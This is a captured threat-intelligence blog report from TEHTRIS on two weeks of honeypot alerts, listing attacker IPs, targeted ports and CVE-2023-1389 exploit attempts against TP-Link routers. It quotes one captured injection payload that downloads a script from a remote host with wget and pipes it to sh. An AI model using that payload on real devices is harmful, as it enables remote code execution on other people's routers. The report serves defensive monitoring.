tehtris.com
162.159.135.42  Public Scan

URL: https://tehtris.com/en/blog/our-selection-of-alerts-on-honeypots-report-12-june-2023/
Submission: On November 11 via api from IN — Scanned from CA


Text Content


June 19, 2023

CERT, Honeypots


OUR SELECTION OF ALERTS ON HONEYPOTS: REPORT 12 – JUNE 2023


A good understanding of active threats is necessary to achieve a good security
posture. The following report provides actual trends that emerge from the
Internet background noise. The data is based on two weeks of monitoring of our
honeypot logs.

Check out our previous report here.

 * CVE-2023-1389 exploit attempts
 * Top ports/protocols targeted by threat actors
 * Most used usernames over SMB protocol
 * Log4j – CVE-2021-44228
 * CVE-2021-41277 exploit attempts


CVE-2023-1389 EXPLOIT ATTEMPTS

Publicly disclosed in mid-March 2023, CVE-2023-1389 (CVSSv3: 8.8) is a command
injection vulnerability in the TP-Link Archer AX21 that allows remote code
execution.

We observed a spike on our honeypots on the 1st of June.

We recorded 93 IPs used to exploit this vulnerability through port 80/TCP. Here
is the top 10:

IP                   AS                                Country
182.155.241[.]214    AS 17809 ( VEE TIME CORP. )       TW
211.196.92[.]241     AS 4766 ( Korea Telecom )         KR
221.163.180[.]245    AS 4766 ( Korea Telecom )         KR
24.89.68[.]141       AS 21804 ( ACCESS-SK )            CA
61.79.206[.]56       AS 4766 ( Korea Telecom )         KR
121.168.207[.]166    AS 4766 ( Korea Telecom )         KR
72.10.198[.]197      AS 36100 ( MTC-BROADBAND )        US
14.39.85[.]181       AS 4766 ( Korea Telecom )         KR
203.217.115[.]226    AS 17809 ( VEE TIME CORP. )       TW
217.181.189[.]74     AS 8399 ( SEWAN SAS )             FR

The IP addresses in bold are not known to public databases that identify
malicious IPs.

Regarding the victims, our European honeypots were mainly targeted (90%),
followed by honeypots in Northern and Southern Asia Pacific.

In the TEHTRIS NTA packets, we came across this command line aimed at exploiting
this CVE:

 * operation=write&country=$(id>`wget hxxp://cdn2[.]duc3k.com/t -O-|sh

TEHTRIS recommends applying updates per vendor instructions.


TOP PORTS/PROTOCOLS TARGETED BY THREAT ACTORS

Port     Protocol
445      TCP
22       TCP
10000    TCP
10001    TCP
10002    TCP
23       TCP
80       TCP
6379     TCP
443      TCP
25565    TCP


MOST USED USERNAMES OVER SMB PROTOCOL

Almost 18 million SMB connection attempts were registered since the beginning of
June on our worldwide honeypots network. The usernames most used by threat
actors are the following:

The most active IP addresses are not known to public databases that identify
malicious IPs:

IP                   AS                                                Country
24.106.191[.]170     AS 11426 ( TWC-11426-CAROLINAS )                  US
178.168.216[.]92     AS 25106 ( Mobile TeleSystems JLLC )              BY
181.65.138[.]129     AS 6147 ( Telefonica del Peru S.A.A. )            PE
1.174.10[.]209       AS 3462 ( Data Communication Business Group )     TW
178.168.214[.]33     AS 25106 ( Mobile TeleSystems JLLC )              BY
1.174.25[.]188       AS 3462 ( Data Communication Business Group )     TW
62.162.126[.]218     AS 6821 ( Makedonski Telekom AD-Skopje )          MK


LOG4J – CVE-2021-44228

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots
network.

Subscribe to our bi-monthly threat intelligence newsletter


CVE-2021-41277 EXPLOIT ATTEMPTS

Want to learn more on this subject?

More insights on this research issued from the alerts on our worldwide honeypots
network.

Subscribe to our bi-monthly threat intelligence newsletter

--------------------------------------------------------------------------------

Information remain TEHTRIS sole property and reproduction is forbidden

TEHTRIS is and remains sole property rights owner of the information provided
herein. Any copy, modification, derivative work, associated document, as well as
every intellectual property right, is and must remain TEHTRIS’ sole and
exclusive property. TEHTRIS authorizes the user to access for read use only.
Except as expressly provided above, nothing contained herein will be construed
as conferring any license or right under any TEHTRIS’ copyright.

No warranty and liability

TEHTRIS will not be held liable for any use, improper or incorrect use of the
information described and/or contained herein and assume no responsibility for
anyone’s use of the information. Although every effort has been made to provide
complete and accurate information, TEHTRIS makes no warranty, expressed or
implied regarding accuracy, adequacy, completeness, legality, reliability, or
usefulness of any information provided herein. This disclaimer applies to both
isolated and aggregated uses of the information.

